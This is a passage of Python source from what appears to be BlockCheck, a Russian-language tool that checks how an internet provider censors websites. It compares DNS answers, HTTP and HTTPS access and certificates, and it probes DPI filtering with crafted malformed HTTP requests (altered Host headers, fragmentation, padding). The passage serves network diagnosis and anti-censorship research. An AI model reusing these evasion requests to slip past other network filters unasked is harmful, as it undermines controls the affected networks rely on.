resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5
if dnsserver:
resolver.nameservers = [dnsserver]
result = []
while len(resolver.nameservers):
try:
resolved = resolver.resolve(site, querytype)
print_debug(str(resolved.response))
for item in resolved.rrset.items:
result.append(item.to_text())
return result
except dns.exception.Timeout:
print_debug("DNS Timeout for", site, "using", resolver.nameservers[0])
resolver.nameservers.remove(resolver.nameservers[0])
# If all the requests failed
return ""
def _get_a_record_over_google_api(site, querytype='A'):
result = []
response = _get_url(google_dns_api + "?name={}&type={}".format(site, querytype))
print_debug("Google API: {}".format(response))
if (response[0] != 200):
return ''
response_js = json.loads(response[1])
try:
for dnsanswer in response_js['Answer']:
if dnsanswer['type'] in (1, 28):
result.append(dnsanswer['data'])
except KeyError:
pass
return result
def _get_a_records(sitelist, querytype='A', dnsserver=None, googleapi=False):
result = []
for site in sorted(sitelist):
try:
if googleapi:
responses = _get_a_record_over_google_api(site, querytype)
print_debug("Google API вернул {}".format(responses))
else:
responses = _get_a_record(site, querytype, dnsserver)
for item in responses:
result.append(item)
except dns.resolver.NXDOMAIN:
print(
"[!] Невозможно получить DNS-запись для домена {} (NXDOMAIN). Результаты могут быть неточными.".format(
site))
except dns.resolver.NoAnswer:
print_debug("DNS NoAnswer:", site)
except dns.exception.DNSException as e:
print_debug("DNSException:", str(e))
really_bad_fuckup_happened()
return sorted(result)
def _decode_bytes(input_bytes):
return input_bytes.decode(errors='replace')
def _get_url(url, proxy=None, ip=None, headers=False, follow_redirects=True):
class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib.response.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
http_error_301 = http_error_302
http_error_303 = http_error_302
http_error_307 = http_error_302
parsed_url = list(urllib.parse.urlsplit(url))
host = parsed_url[1]
if parsed_url[0].lower() == "https":
# Manually check certificate as we may need to connect by IP later
# and handling certificate check in urllib is painful and invasive
context_hostname_check = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
context_hostname_check.verify_mode = ssl.CERT_REQUIRED
conn = context_hostname_check.wrap_socket(socket.socket(socket.AF_INET6 if \
(':' in ip if ip else False) else socket.AF_INET),
server_hostname=host)
conn.settimeout(10)
print_debug("_get_url: connecting over " + ('IPv6' if \
(':' in ip if ip else False) else 'IPv4'))
try:
conn.connect((ip if ip else host, 443))
except (ssl.CertificateError) as e:
print_debug("_get_url: ssl.CertificateError", repr(e))
return (-1, '')
except (ssl.SSLError, socket.timeout, socket.error) as e:
print_debug("_get_url: socket exception", repr(e))
if 'CERTIFICATE_VERIFY_FAILED' in str(e):
return (-1, '')
return (0, '')
finally:
try:
conn.shutdown(socket.SHUT_RDWR)
except Exception:
pass
try:
conn.close()
except Exception:
pass
# SSL Context for urllib
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
# Disable SSL certificate check as we validated it earlier
# This is required to bypass SNI woes when we connect by IP
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
https_handler = urllib.request.HTTPSHandler(context=context)
if not follow_redirects:
# HACK: this works only for HTTP and conflicts with https_handler
opener = urllib.request.build_opener(NoRedirectHandler, https_handler)
else:
opener = urllib.request.build_opener(https_handler)
if ip:
parsed_url[1] = '[' + str(ip) + ']' if ':' in str(ip) else str(ip)
newurl = urllib.parse.urlunsplit(parsed_url)
req = urllib.request.Request(newurl)
req.add_header('Host', host)
else:
req = urllib.request.Request(url)
if proxy:
req.set_proxy(proxy, 'http')
req.add_header('User-Agent', SWUSERAGENT)
try:
opened = opener.open(req, timeout=15)
output = opened.read()
output = _decode_bytes(output)
if (headers):
output = str(opened.headers) + output
opened.close()
except (ssl.CertificateError) as e:
print_debug("_get_url: late ssl.CertificateError", repr(e))
return (-1, '')
except (urllib.error.URLError, ssl.SSLError, socket.error, socket.timeout) as e:
print_debug("_get_url: late socket exception", repr(e))
if 'CERTIFICATE_VERIFY_FAILED' in str(e):
return (-1, '')
if type(e) is urllib.error.HTTPError:
return (e.code, '')
return (0, '')
except (KeyboardInterrupt, SystemExit) as e:
# re-raise exception to send it to caller function
raise e
except Exception as e:
print("[☠] Неизвестная ошибка:", repr(e))
return (0, '')
return (opened.status, output)
def _cut_str(string, begin, end):
cut_begin = string.find(begin)
if cut_begin == -1:
return
cut_end = string[cut_begin:].find(end)
if cut_end == -1:
return
return string[cut_begin + len(begin):cut_begin + cut_end]
def get_ip_and_isp():
# Dirty and cheap
try:
request = urllib.request.Request("https://2ip.ru/",
headers={"User-Agent": SWUSERAGENT}
)
data = _decode_bytes(urllib.request.urlopen(request, timeout=10).read())
ip = _cut_str(data, '<big id="d_clip_button">', '</big>')
isp = ' '.join(_cut_str(data, '"/isp/', '</a>').replace('">', '').split())
if ip and isp:
isp = urllib.parse.unquote(isp).replace('+', ' ')
return (ip, isp)
except Exception:
return
def mask_ip(ipaddr):
ipaddr_s = ipaddress.ip_address(ipaddr)
if ipaddr_s.version == 4:
ipaddr_s = ipaddress.ip_interface(ipaddr + '/24')
return str(ipaddr_s.network).replace('0/24', 'xxx')
if ipaddr_s.version == 6:
ipaddr_s = ipaddress.ip_interface(ipaddr + '/64')
return str(ipaddr_s.network).replace(':/64', 'xxxx::')
return None
def _dpi_send(host, port, data, fragment_size=0, fragment_count=0):
sock = socket.create_connection((host, port), 10)
if fragment_count:
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
try:
for fragment in range(fragment_count):
sock.sendall(data[:fragment_size].encode())
data = data[fragment_size:]
sock.sendall(data.encode())
recvdata = sock.recv(8192)
recv = recvdata
while recvdata:
recvdata = sock.recv(8192)
recv += recvdata
finally:
try:
sock.shutdown(socket.SHUT_RDWR)
except Exception:
pass
sock.close()
return _decode_bytes(recv)
def _dpi_build_tests(host, urn, ip, lookfor):
dpi_built_list = \
{'дополнительный пробел после GET':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'перенос строки перед GET':
{'data': "\r\nGET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'табуляция в конце домена':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\t\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'фрагментирование заголовка':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 2, 'fragment_count': 6},
'точка в конце домена':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}.\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'заголовок hoSt вместо Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hoSt: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'заголовок hOSt вместо Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hOSt: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'значение Host БОЛЬШИМИ БУКВАМИ':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host.upper()),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'отсутствие пробела между двоеточием и значением заголовка Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host:{}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'перенос строки в заголовках в UNIX-стиле':
{'data': "GET {} HTTP/1.0\n".format(urn) + \
"Host: {}\nConnection: close\n\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'необычный порядок заголовков':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\nHost: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'фрагментирование заголовка, hoSt и отсутствие пробела одновременно':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hoSt:{}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 2, 'fragment_count': 6},
'7 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 1000) + \
"X-Padding2: {}\r\n".format('2' * 1000) + \
"X-Padding3: {}\r\n".format('3' * 1000) + \
"X-Padding4: {}\r\n".format('4' * 1000) + \
"X-Padding5: {}\r\n".format('5' * 1000) + \
"X-Padding6: {}\r\n".format('6' * 1000) + \
"X-Padding7: {}\r\n".format('7' * 1000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'15 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 1000) + \
"X-Padding2: {}\r\n".format('2' * 1000) + \
"X-Padding3: {}\r\n".format('3' * 1000) + \
"X-Padding4: {}\r\n".format('4' * 1000) + \
"X-Padding5: {}\r\n".format('5' * 1000) + \
"X-Padding6: {}\r\n".format('6' * 1000) + \
"X-Padding7: {}\r\n".format('7' * 1000) + \
"X-Padding8: {}\r\n".format('8' * 1000) + \
"X-Padding9: {}\r\n".format('9' * 1000) + \
"X-Padding10: {}\r\n".format('0' * 1000) + \
"X-Padding11: {}\r\n".format('1' * 1000) + \
"X-Padding12: {}\r\n".format('2' * 1000) + \
"X-Padding13: {}\r\n".format('3' * 1000) + \
"X-Padding14: {}\r\n".format('4' * 1000) + \
"X-Padding15: {}\r\n".format('5' * 1000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'21 КБ данных перед Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Connection: close\r\n" + \
"X-Padding1: {}\r\n".format('1' * 3000) + \
"X-Padding2: {}\r\n".format('2' * 3000) + \
"X-Padding3: {}\r\n".format('3' * 3000) + \
"X-Padding4: {}\r\n".format('4' * 3000) + \
"X-Padding5: {}\r\n".format('5' * 3000) + \
"X-Padding6: {}\r\n".format('6' * 3000) + \
"X-Padding7: {}\r\n".format('7' * 3000) + \
"Host: {}\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
}
return dpi_built_list
def check_isup(page_url):
"""
Check if the site is up using isup.me or whatever is set in
`isup_fmt`. Return True if it's up, False if it's not, None
if isup.me is itself unaccessible or there was an error while
getting the response.
`page_url` must be a string and presumed to be sanitized (but
doesn't have to be the domain and nothing else, isup.me accepts
full URLs)
isup.me can't check HTTPS URL yet, so we return True for them.
It's still useful to call check_isup even on HTTPS URLs for two
reasons: because we may switch to a service that can can check them
in the future and because check_isup will output a notification for
the user.
"""
# Note that isup.me doesn't use HTTPS and therefore the ISP can slip
# false information (and if it gets blocked, the error page by the ISP can
# happen to have the markers we look for). We should inform the user about
# this possibility when showing results.
if disable_isup:
return True
elif page_url.startswith("https://"):
# print("[☠] {} не поддерживает HTTPS, считаем, что сайт работает, "
# "а проблемы только у нас".format(isup_server))
return True
print("\tПроверяем доступность через {}".format(isup_server))
url = isup_fmt.format(urllib.parse.urlparse(page_url).netloc)
status, output = _get_url(url)
# if output:
# output = json.loads(output)
if status in (0, -1):
print("[⁇] Ошибка при соединении с {}".format(isup_server))
return None
elif status != 200:
print("[⁇] Неожиданный ответ от {}, код {}".format(isup_server, status))
return None
elif 'upicon' in output:
print("[☠] Сайт доступен, проблемы только у нас")
return True
elif 'downicon' in output:
print("[✗] Сайт недоступен, видимо, он не работает")
return False
else:
print("[⁇] Не удалось распознать ответ от {}".format(isup_server))
return None
DNS_IPV4 = 0
DNS_IPV6 = 1
def test_dns(dnstype=DNS_IPV4):
sites_list = list(dns_records_list)
query_type = ("A" if dnstype == DNS_IPV4 else "AAAA")
print("[O] Тестируем " + ("IPv4" if dnstype == DNS_IPV4 else "IPv6") + " DNS")
resolved_default_dns = _get_a_records(sites_list, query_type)
print("\tЧерез системный DNS:\t", str(resolved_default_dns))
resolved_google_dns = _get_a_records(sites_list, query_type, (google_dns if dnstype == DNS_IPV4 else google_dns_v6))
if resolved_google_dns:
print("\tЧерез Google DNS:\t", str(resolved_google_dns))
else:
print("\tНе удалось подключиться к Google DNS")
resolved_google_api = _get_a_records(sites_list, query_type, googleapi=True)
if resolved_google_api:
print("\tЧерез Google API:\t", str(resolved_google_api))
else:
print("\tНе удалось подключиться к Google API")
really_bad_fuckup_happened()
resolved_fake_dns = _get_a_records((sites_list[0],), query_type, (fake_dns if dnstype == DNS_IPV4 else fake_dns_v6))
if resolved_fake_dns:
print("\tЧерез недоступный DNS:\t", str(resolved_fake_dns))
else:
print("\tНесуществующий DNS не вернул адресов (это не ошибка)")
if not resolved_default_dns:
print("[?] Ошибка получения адреса через системный DNS")
really_bad_fuckup_happened()
return 5
elif not resolved_google_dns:
print("[☠] Сторонние DNS блокируются")
return 4
# Assume that Google API always works and returns correct addresses
dns_records = resolved_google_api
if not dns_records:
print("[?] Не удалось связаться с Google API. Проверка DNS сломана.")
really_bad_fuckup_happened()
return 5
if resolved_default_dns == resolved_google_dns:
if not resolved_fake_dns and len(resolved_default_dns) == len(dns_records):
print("[✓] DNS-записи не подменяются")
print("[✓] DNS не перенаправляется")
return 0
if resolved_default_dns == dns_records:
# Resolved DNS = Google DNS = Google API, and fake
# DNS resolved something.
print("[✓] DNS-записи не подменяются")
print("[☠] DNS перенаправляется")
return 1
else:
print("[☠] DNS-записи подменяются")
print("[☠] DNS перенаправляется")
return 2
else:
if resolved_google_dns == dns_records:
print("[☠] DNS-записи подменяются")
print("[✓] DNS не перенаправляется")
return 3
if resolved_fake_dns:
# Resolved DNS != Google DNS != Google API, and fake DNS resolved something.
print("[☠] DNS-записи подменяются")
print("[☠] DNS перенаправляется")
return 2
print("[?] Способ блокировки DNS определить не удалось. "
"Убедитесь, что вы используете DNS провайдера, а не сторонний.")
really_bad_fuckup_happened()
return 5
HTTP_ACCESS_NOBLOCKS = 0
HTTP_ACCESS_IPBLOCK = 1
HTTP_ACCESS_IPDPI = 2
HTTP_ACCESS_FULLDPI = 3
HTTP_ISUP_ALLUP = 0
HTTP_ISUP_SOMEDOWN = 1
HTTP_ISUP_ALLDOWN = 2
HTTP_ISUP_BROKEN = 3
def test_http_access(by_ip=False):
"""
Test plain HTTP access and return three values:
1. The result - one of the HTTP_ACCESS_* constants
2. isup.me info - one of the HTTP_ISUP_* constants
3. Subdomain block result
"""
sites = http_list
proxy = proxy_addr
print("[O] Тестируем HTTP" + (' (по настоящим IP-адресам сайтов)' if by_ip else ''))
successes_v4 = 0
successes_v6 = 0
successes_proxy = 0
down = 0
blocks = 0
blocks_ambiguous = 0
blocks_subdomains = 0
result_v4 = -1
result_v6 = -1
for site in sorted(sites):
print("\tОткрываем ", site)
# First try to resolve IP address using Google API.
# Use a static one if this did not work.
if by_ip:
domain = list(urllib.parse.urlsplit(site))[1]
newip = _get_a_record_over_google_api(domain)
if ipv6_available:
newipv6 = _get_a_record_over_google_api(domain, 'AAAA')
if newip:
sites[site]['ip'] = newip[0]
if ipv6_available and sites[site].get('ipv6') and newipv6:
sites[site]['ipv6'] = '[' + newipv6[0] + ']'
if ipv6_available:
result = _get_url(site, ip=sites[site].get('ip'), headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
result_v6 = _get_url(site, ip=sites[site].get('ipv6'), headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
else:
result = _get_url(site, ip=sites[site].get('ip') if by_ip else None,
headers=True,
follow_redirects=sites[site].get('follow_redirects', True))
result_ok = (result[0] == sites[site]['status'] and result[1].find(sites[site]['lookfor']) != -1)
if ipv6_available and sites[site].get('ipv6'):
result_v6_ok = (result_v6[0] == sites[site]['status'] and result_v6[1].find(sites[site]['lookfor']) != -1)
else:
result_v6_ok = True # Not really
if result_ok and result_v6_ok:
print("[✓] Сайт открывается")
if sites[site].get('is_blacklisted', True):
successes_v4 += 1
successes_v6 += 1
elif ipv6_available and (result_ok or result_v6_ok):
if not result_ok and result_v6_ok:
print("[!] Сайт открывается только по IPv6")
successes_v6 += 1
else:
print("[!] Сайт открывается только по IPv4")
successes_v4 += 1
if not (result_ok and result_v6_ok):
if (result[0] == sites[site]['status'] or (ipv6_available and result_v6[0] == sites[site]['status'])):
print("[☠] Получен неожиданный ответ, скорее всего, "
"страница-заглушка провайдера. Пробуем через прокси.")
else:
print("[☠] Сайт не открывается, пробуем через прокси")
result_proxy = _get_url(site, proxy)
if result_proxy[0] == sites[site]['status'] and result_proxy[1].find(sites[site]['lookfor']) != -1:
print("[✓] Сайт открывается через прокси")
if sites[site].get('is_blacklisted', True):
successes_proxy += 1
else:
if result_proxy[0] == sites[site]['status']:
print("[☠] Получен неожиданный ответ, скорее всего, "
"страница-заглушка провайдера. Считаем заблокированным.")
else:
print("[☠] Сайт не открывается через прокси")
isup = check_isup(site)
if isup is None:
if sites[site].get('is_blacklisted', True):
blocks_ambiguous += 1
elif isup:
if sites[site].get('subdomain'):
blocks_subdomains += 1
if sites[site].get('is_blacklisted', True):
blocks += 1
else:
if sites[site].get('is_blacklisted', True):
down += 1
all_sites = [http_list[i].get('is_blacklisted', True) for i in http_list].count(True)
# Result without isup.me
if successes_v4 == all_sites:
result_v4 = HTTP_ACCESS_NOBLOCKS
elif successes_v4 > 0 and successes_v4 + successes_proxy == all_sites:
result_v4 = HTTP_ACCESS_IPDPI
elif successes_v4 > 0:
result_v4 = HTTP_ACCESS_FULLDPI
else:
result_v4 = HTTP_ACCESS_IPBLOCK
if ipv6_available:
if successes_v6 == all_sites:
result_v6 = HTTP_ACCESS_NOBLOCKS
elif successes_v6 > 0 and successes_v6 + successes_proxy == all_sites:
result_v6 = HTTP_ACCESS_IPDPI
elif successes_v6 > 0:
result_v6 = HTTP_ACCESS_FULLDPI
else:
result_v6 = HTTP_ACCESS_IPBLOCK
# isup.me info
if blocks_ambiguous > 0:
isup = HTTP_ISUP_BROKEN
elif down == all_sites:
isup = HTTP_ISUP_ALLDOWN
elif down > 0:
isup = HTTP_ISUP_SOMEDOWN
else:
isup = HTTP_ISUP_ALLUP
return result_v4, result_v6, isup, (blocks_subdomains > 0)
def test_https_cert():
sites = https_list
isup_problems = False
print("[O] Тестируем HTTPS")
siteresults = []
for site in sorted(sites):
print("\tОткрываем ", site)
domain = list(urllib.parse.urlsplit(site))[1]
newip = _get_a_record_over_google_api(domain)
if newip:
newip = newip[0]
result = _get_url(site, ip=newip, follow_redirects=False)
else:
print_debug("Can't resolve IP for", site)
result = _get_url(site, follow_redirects=False)
if result[0] == -1:
print("[☠] Сертификат подменяется")
siteresults.append(False)
elif result[0] == 0:
print("[☠] Сайт не открывается")
if check_isup(site):
siteresults.append('no')
else:
isup_problems = True
else:
print("[✓] Сайт открывается")
siteresults.append(True)
if 'no' in siteresults:
# Blocked
return 2
elif False in siteresults:
# Wrong certificate
return 1
elif not isup_problems and all(siteresults):
# No blocks
return 0
else:
# Some sites are down or unknown result
return 3
def test_dpi():
global message_to_print
message_to_print = ""
print("[O] Тестируем обход DPI" + (' (только IPv4)' if ipv6_available else ''))
dpiresults = []
for dpisite in sorted(dpi_list):
site = dpi_list[dpisite]
# First try to resolve IP address using Google API.
# Use a static one if this did not work.
newip = _get_a_record_over_google_api(site['host'])
if newip:
site['ip'] = newip[0]
if ipv6_available:
newip = _get_a_record_over_google_api(site['host'], 'AAAA')
if newip:
site['ipv6'] = newip[0]
dpi_built_tests = _dpi_build_tests(site['host'], site['urn'], site['ip'], site['lookfor'])
for testname in sorted(dpi_built_tests):
test = dpi_built_tests[testname]
print("\tПробуем способ «{}» на {}".format(testname, dpisite))
try:
result = _dpi_send(test.get('ip'), 80, test.get('data'), test.get('fragment_size'),
test.get('fragment_count'))
except (KeyboardInterrupt, SystemExit) as e:
# re-raise exception to send it to caller function
raise e
except Exception as e:
print("[☠] Ошибка:", repr(e))
else:
if result.split("\n")[0].find('200 ') != -1 and result.find(test['lookfor']) != -1:
print("[✓] Сайт открывается")
dpiresults.append(testname)
elif result.split("\n")[0].find('200 ') == -1 and result.find(test['lookfor']) != -1:
print("[!] Сайт не открывается, обнаружен пассивный DPI!")
dpiresults.append('Passive DPI')
else:
print("[☠] Сайт не открывается")
if web_interface:
return message_to_print
return list(set(dpiresults))
def check_ipv6_availability():
print("Проверка работоспособности IPv6", end='')
v6addr = _get_a_record("ipv6.icanhazip.com", "AAAA")
if (v6addr):
v6 = _get_url("http://ipv6.icanhazip.com/", ip=v6addr[0])
if len(v6[1]):
v6src = v6[1].strip()
if force_ipv6 or (not ipaddress.IPv6Address(v6src).teredo
and not ipaddress.IPv6Address(v6src).sixtofour):
print(": IPv6 доступен!")
return v6src
else:
print(": обнаружен туннель Teredo или 6to4, игнорируем.")
return False
print(": IPv6 недоступен.")
return False
def get_ispinfo(ipaddr):
try:
rdap_response = ipwhois.IPWhois(ipaddr)
ispinfo = rdap_response.lookup_rdap(depth=1)
return ispinfo['asn']
except (ipwhois.exceptions.ASNRegistryError,
ipwhois.exceptions.ASNLookupError,
ipwhois.exceptions.ASNParseError,
ipwhois.exceptions.HTTPLookupError,
ipwhois.exceptions.HTTPRateLimitError):
return False
def main():
ipv6_addr = None
global ipv6_available
print("BlockCheck v{}".format(VERSION))
print("Для получения корректных результатов используйте DNS-сервер",
"провайдера и отключите средства обхода блокировок.")
print()
if web_interface:
return message_to_print
latest_version = _get_url("https://raw.githubusercontent.com/ValdikSS/blockcheck/master/latest_version.txt")
if latest_version[0] == 200 and latest_version[1].strip() != VERSION:
print("Доступная новая версия программы: {}. Обновитесь, пожалуйста.".format(latest_version[1].strip()))
print()
if not disable_ipv6:
ipv6_available = check_ipv6_availability()
if (ipv6_available):
ipv6_addr = ipv6_available
ip_isp = get_ip_and_isp()
if ip_isp:
if ipv6_available:
print("IP: {}, IPv6: {}, провайдер: {}".format(mask_ip(ip_isp[0]), mask_ip(ipv6_addr), ip_isp[1]))
if not force_ipv6:
asn4 = get_ispinfo(ip_isp[0])
asn6 = get_ispinfo(ipv6_addr)
if asn4 and asn6 and asn4 != asn6:
ipv6_available = False
print("Вероятно, у вас IPv6-туннель. Проверка IPv6 отключена.")
else:
print("IP: {}, провайдер: {}".format(mask_ip(ip_isp[0]), ip_isp[1]))
print()
dnsv4 = test_dns(DNS_IPV4)
dnsv6 = 0
if ipv6_available:
print()
dnsv6 = test_dns(DNS_IPV6)
print()
http_v4, http_v6, http_isup, subdomain_blocked = test_http_access((dnsv4 != 0) or (dnsv6 != 0))
print()
https = test_https_cert()
print()
dpi = '-'
if http_v4 > 0 or http_v6 > 0 or force_dpi_check:
dpi = test_dpi()
print()
print("[!] Результат:")
if dnsv4 == 5:
print("[⚠] Не удалось определить способ блокировки IPv4 DNS.\n",
"Верните настройки DNS провайдера, если вы используете сторонний DNS-сервер.",
"Если вы используете DNS провайдера, возможно, ответы DNS модифицирует вышестоящий",
"провайдер.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 4:
print("[⚠] Ваш провайдер блокирует сторонние IPv4 DNS-серверы.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 3:
print("[⚠] Ваш провайдер подменяет DNS-записи, но не перенаправляет сторонние IPv4 DNS-серверы на свой.\n",
"Вам поможет смена DNS, например, на Яндекс.DNS 77.88.8.8 или Google DNS 8.8.8.8 и 8.8.4.4.")
elif dnsv4 == 2:
print("[⚠] Ваш провайдер подменяет DNS-записи и перенаправляет сторонние IPv4 DNS-серверы на свой.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv4 == 1:
print("[⚠] Ваш провайдер перенаправляет сторонние IPv4 DNS-серверы на свой, но не подменяет DNS-записи.\n",
"Это несколько странно и часто встречается в мобильных сетях.\n",
"Если вы хотите использовать сторонний DNS, вам следует использовать шифрованный канал до " + \
"DNS-серверов, например, через VPN, Tor, HTTPS/Socks прокси или DNSCrypt, но обходу " + \
"блокировок это не поможет.")
if ipv6_available:
if dnsv6 == 5:
print("[⚠] Не удалось определить способ блокировки IPv6 DNS.\n",
"Верните настройки DNS провайдера, если вы используете сторонний DNS-сервер.",
"Если вы используете DNS провайдера, возможно, ответы DNS модифицирует вышестоящий",
"провайдер.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 4:
print("[⚠] Ваш провайдер блокирует сторонние IPv6 DNS-серверы.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 3:
print("[⚠] Ваш провайдер подменяет DNS-записи, но не перенаправляет сторонние IPv6 DNS-серверы на свой.\n",
"Вам поможет смена DNS, например, на Яндекс.DNS 2a02:6b8::feed:0ff или Google DNS 2001:4860:4860::8888.")
elif dnsv6 == 2:
print("[⚠] Ваш провайдер подменяет DNS-записи и перенаправляет сторонние IPv6 DNS-серверы на свой.\n",
"Вам следует использовать шифрованный канал до DNS-серверов, например, через VPN, Tor, " + \
"HTTPS/Socks прокси или DNSCrypt.")
elif dnsv6 == 1:
print("[⚠] Ваш провайдер перенаправляет сторонние IPv6 DNS-серверы на свой, но не подменяет DNS-записи.\n",
"Это несколько странно и часто встречается в мобильных сетях.\n",
"Если вы хотите использовать сторонний DNS, вам следует использовать шифрованный канал до " + \
"DNS-серверов, например, через VPN, Tor, HTTPS/Socks прокси или DNSCrypt, но обходу " + \
"блокировок это не поможет.")
if https == 1:
print("[⚠] Ваш провайдер подменяет HTTPS-сертификат на свой для сайтов из реестра.")
elif https == 2:
print("[⚠] Ваш провайдер полностью блокирует доступ к HTTPS-сайтам из реестра.")
elif https == 3:
print("[⚠] Доступ по HTTPS проверить не удалось, повторите тест позже.")
if subdomain_blocked:
print("[⚠] Ваш провайдер блокирует поддомены у заблокированного домена.")
if http_isup == HTTP_ISUP_BROKEN:
print("[⚠] {0} даёт неожиданные ответы или недоступен. Рекомендуем " \
"повторить тест, когда он начнёт работать. Возможно, эта " \
"версия программы устарела. Возможно (но маловероятно), " \
"что сам {0} уже занесён в чёрный список.".format(isup_server))
elif http_isup == HTTP_ISUP_ALLDOWN:
print("[⚠] Согласно {}, все проверяемые сайты сейчас не работают. " \
"Убедитесь, что вы используете последнюю версию программы, и " \
"повторите тест позже.".format(isup_server))
elif http_isup == HTTP_ISUP_SOMEDOWN:
print("[⚠] Согласно {}, часть проверяемых сайтов сейчас не работает. " \
"Убедитесь, что вы используете последнюю версию программы, и " \
"повторите тест позже.".format(isup_server))
elif http_isup != HTTP_ISUP_ALLUP:
print("[⚠] ВНУТРЕННЯЯ ОШИБКА ПРОГРАММЫ, http_isup = {}".format(http_isup))
def print_http_result(symbol, message):
if http_isup == HTTP_ISUP_ALLUP:
print("{} {}".format(symbol, message))
else:
# ACHTUNG: translating this program into other languages
# might be tricky. Not into English, though.
print("{} Если проигнорировать {}, то {}" \
.format(symbol, isup_server, message[0].lower() + message[1:]))
if http_v4 == HTTP_ACCESS_IPBLOCK:
if (ipv6_available and http_v6 == HTTP_ACCESS_IPBLOCK) or not ipv6_available:
print_http_result("[⚠]", "Ваш провайдер блокирует по IP-адресу. " \
"Используйте любой способ обхода блокировок.")
elif ipv6_available and http_v6 != HTTP_ACCESS_IPBLOCK:
print_http_result("[⚠]", "Ваш провайдер блокирует IPv4-сайты по IP-адресу. " \
"Используйте любой способ обхода блокировок.")
elif http_v4 == HTTP_ACCESS_FULLDPI:
if (ipv6_available and http_v6 == HTTP_ACCESS_FULLDPI) or not ipv6_available:
print_http_result("[⚠]", "У вашего провайдера \"полный\" DPI. Он " \
"отслеживает ссылки даже внутри прокси, " \
"поэтому вам следует использовать любое " \
"шифрованное соединение, например, " \
"VPN или Tor.")
elif ipv6_available and http_v6 != HTTP_ACCESS_FULLDPI:
print_http_result("[⚠]", "У вашего провайдера \"полный\" DPI для IPv4. Он " \
"отслеживает ссылки даже внутри прокси, " \
"поэтому вам следует использовать любое " \
"шифрованное соединение, например, " \
"VPN или Tor.")
elif http_v4 == HTTP_ACCESS_IPDPI:
if (ipv6_available and http_v6 == HTTP_ACCESS_IPDPI) or not ipv6_available:
print_http_result("[⚠]", "У вашего провайдера \"обычный\" DPI. " \
"Вам поможет HTTPS/Socks прокси, VPN или Tor.")
elif ipv6_available and http_v6 != HTTP_ACCESS_IPDPI:
print_http_result("[⚠]", "У вашего провайдера \"обычный\" DPI для IPv4. " \
"Вам поможет HTTPS/Socks прокси, VPN или Tor.")
elif http_isup == HTTP_ISUP_ALLUP and http_v4 == HTTP_ACCESS_NOBLOCKS \
and https == 0:
print_http_result("[☺]", "Ваш провайдер не блокирует сайты.")
